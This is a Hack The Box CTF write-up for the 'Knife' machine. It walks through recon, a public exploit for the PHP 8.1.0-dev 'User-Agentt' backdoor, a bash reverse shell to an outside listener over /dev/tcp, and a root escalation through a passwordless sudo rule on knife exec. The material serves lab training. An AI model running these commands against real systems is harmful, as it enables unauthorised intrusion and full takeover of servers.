Contents

🕵 HTB-Writeup : KNIFE

Recon

Nmap scan

With nmap we found two open ports. A webserver and ssh server.

1
2
3
4
5
6
7
8
# basic scan
nmap -A -sV -Pn 10.10.10.40

22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title:  Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Vulnerabilities

Thanks to wappalyzer, we found version of apache and php:

  • Apache 2.4.41
  • PHP 8.1.0

We search for known vulnerabilities on exploitdb.

1
2
3
4
5
6
7
./searchexploit apache 2.4.41 # nothing

./searchexploit php 8.1.0
# PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution                              | php/webapps/49933.py
# PHP-Nuke 8.1.0.3.5b (Your_Account Module) - Blind SQL Injection (Benchmark Mode) | php/webapps/14320.pl
# PHP-Nuke 8.1.0.3.5b - 'Downloads' Blind SQL Injection                            | php/webapps/18148.pl
# PHP-Nuke 8.1.0.3.5b - Remote Command Execution                                   | php/webapps/14319.pl

We find a known RCE on that PHP version. Let’s try to exploit this vulnerability.

Exploit

Entry point

We try a first script found with searchexploit

1
2
3
4
5
6
7
# PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution
python3 exploitdb/exploits/php/webapps/49933.py 
Enter the full host url:
http://10.10.10.242/icons/

$ whoami
james

We got our first shell. We are connected into the server with james user. We manage to get a clean shell.

1
2
3
4
# on host
nc -lvnp 4444
# on target
bash -c "bash -i >& /dev/tcp/10.10.16.6/4444 0>&1"

We can get the first user flag.

privesc

I manage first to check if they are command that the user james can run with sudo rights.

1
2
3
4
5
# list commands that james can run with sudo 
sudo -l

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife

We can see here that james can run the command knife with root permission without enter any password. Let’s check what option knife can take. Maybe a command enumeration is possible.

1
2
3
4
knife --help

** EXEC COMMANDS **
knife exec [SCRIPT] (options)

Bingo! After some research on the helper I found the sub-command exec that allow us to execute command. Let’s try to pop a root shell !

1
2
3
4
5
sudo -u root knife exec '/bin/bash'
ERROR: SyntaxError: /bin/bash: Invalid char `\x7F' in expression
       /bin/bash: Invalid char `\x02' in expression
       /bin/bash: Invalid char `\x01' in expression
       /bin/bash: Invalid char `\x01' in expression

I first get an error. The command miss interpret some character. I found the option -E that allow to run command with the sub-command exec.

1
2
3
4
# lets try -E option to pass command
sudo -u root knife exec -E 'exec "/bin/bash"'
whoami
root

We are root! We can get the flag and close the box !

Tags

PHP, Backdoor, Easy, External, Apache, Penetration Tester Level 1, A06:2021-Vulnerable And Outdated Components, Public Vulnerabilities, Sudo Exploitation, Enumeration